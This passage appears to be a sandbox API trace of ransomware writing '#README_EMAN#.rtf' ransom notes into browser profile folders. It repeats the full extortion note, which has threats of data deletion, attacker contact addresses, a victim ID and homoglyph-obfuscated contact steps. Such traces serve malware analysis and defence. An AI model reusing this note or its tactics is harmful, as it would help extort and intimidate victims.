h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nóÖÏÅÂÁÊz\x0b|\x14…§o\x15Ô\x09ØÕ*bªí\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0286.375] WriteFile (in: hFile=0x2e8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.376] CloseHandle (hObject=0x2e8) returned 1 [0286.376] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf")) returned 0x20 [0286.376] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\#readme_eman#.rtf")) returned 0x20 [0286.376] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\#readme_eman#.rtf")) returned 0x20 [0286.376] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\#readme_eman#.rtf")) returned 0x20 [0286.376] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0286.377] GetLastError () returned 0x2 [0286.377] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0286.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us 